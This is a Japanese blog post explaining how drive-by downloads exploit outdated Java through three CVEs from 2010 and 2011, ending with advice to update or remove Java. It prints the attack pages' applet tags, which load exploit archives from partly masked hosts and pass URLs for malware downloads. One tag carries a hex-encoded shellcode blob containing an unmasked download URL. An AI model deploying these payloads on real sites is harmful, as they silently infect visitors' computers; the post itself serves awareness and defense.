|
サイトを単にブラウザで開いただけ(見ただけ!!)で強制的なウィルス感染被害にあってしまう脅威が確認されてますなー。普通何かしらのプログラムを使いたい場合、ユーザーが実行ファイルを手動でダウンロードしてきて、そのファイルを起動させて始めて利用できるわけですが、ソフトウェアの脆弱性を悪用すると、そういう処理をすっ飛ばして不正な処理の実行が実現されちゃうん。 ![]() Java のバージョンが古いままだと・・・ 【Exploit Java Vulnerability】たとえば、米国Oracle(オラクル)によるJava(JRE)の脆弱性を悪用した攻撃例をいくつか挙げときましょう。Javaの悪用は、2010年あたりからウイルス攻撃者にチョー人気です。主要なブラウザ(Internet Explorer、Firefox、Chrome、Opera)上で動作するJavaを経由してWindowsパソコンを一発で陥落させることができます。 まず、攻撃ページへブラウザを強制的に誘導させるコードを、ハッキングして乗っ取った一般の正規サイトなどに挿入します。他にもメールだったりTwitterだったりで攻撃ページへと誘導してもOK。攻撃ページには下のようなHTMLタグを用意しておきます。 ■ タイプA (脆弱性識別番号:CVE-2010-0840) 「dfgfhjkhcfryjtdezsf.jar」ファイルにはJavaの脆弱性を攻撃する不正な処理が含まれていて、2行目のURLアドレスへアクセスすると落ちてくる実行ファイルを勝手にダウンロードしてきて強制的に起動する。 <applet code='folder.Globus.class' archive='http://***.cz.cc/dfgfhjkhcfryjtdezsf.jar'> <param name='url' value='http://***.cz.cc/out.php?a=QQkEEkcJBQQEBAQG&p=1'/> </applet>■ タイプB (脆弱性識別番号:CVE-2010-0842) 「xoxo.jar」ファイルにはJavaの脆弱性を攻撃する不正な処理が含まれていて、数字の羅列(サウンドデータ)の中に含まれてるURLアドレスへアクセスすると落ちてくる実行ファイルを勝手にダウンロードしてきて強制的に起動する。 <applet archive="xoxo.jar" code="zap.class" width="100" height="100"><param name="pix" value="4952455a000000010000000200000065534f4e476d53cb6d00000000477fff00010000010100000004001c0008007f00000000000000000000000000000000000000000000000000000000000000015449544c9fb1b50d0a7efb709c86feb03593e25ede(〜中略〜)8e4e0eecff5504935033c05050568b550483c27f83c2315250b8361a2f70ff55045b33ff5756b898fe8a0eff550457b8efcee060ff5504687474703a2f2f636f6e7363696f7573646f6e75742e76762e63632f73686f777468726561642e7068703f743d313031363432"></applet>■ タイプC (脆弱性識別番号:CVE-2010-4452) 「ftzxcvb(.class)」ファイルにはJavaの脆弱性を攻撃する不正な処理が含まれていて、4行目に指定されてるURLアドレスへアクセスすると落ちてくる実行ファイルを勝手にダウンロードしてきて強制的に起動する。 <applet> <param name="code" value="http://***/ftzxcvb"> <param name="codebase" value="file:C:\Program Files\java\jre6\lib\ext"> <param name="foreground" value="http://***.cz.cc/out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=8"> </applet>これらは、すべてブラウザ内部で処理されるので、ユーザーは裏で起こってるトンでもない事態に気づきません。運よく気付くのは、強制的に実行させられてしまったウイルスそのものの動き・・・結局は後の祭りの状態ってことですな。 ![]() ウイルス感染被害にあわない条件1. そもそもJava(JRE)が導入されてないJavaが導入されてないと攻撃しようがないので影響ありません。ただ、一般的なメーカー製パソコンには購入時点であらかじめJavaがインストールされてる場合が多いです。トンでもなく危険なソフトがまさか自分のパソコンに導入されているとはつゆ知らず・・・なんてな状態の人がいるん。 2. Javaは導入されているが、脆弱性がすでに解消されてる最新版を導入してある タイプA/Bは「Java 6 Update 19」(2010年4月)、タイプCは「Java 6 Update 24」(2011年2月)にて不正な処理が機能しないよう問題の修正が行われてます。が、現実的には対処してないユーザーが多い結果としてJavaの悪用が人気なん。 3.環境がMac OS、Linux、携帯電話・スマートフォン、ゲーム機である 影響があるのはWindowsパソコン(Windows XP/Vista/7)だけです。攻撃のターゲットは全Windowsユーザーになるん。 |

>
- コンピュータとインターネット
>
- コンピュータ
>
- パソコン







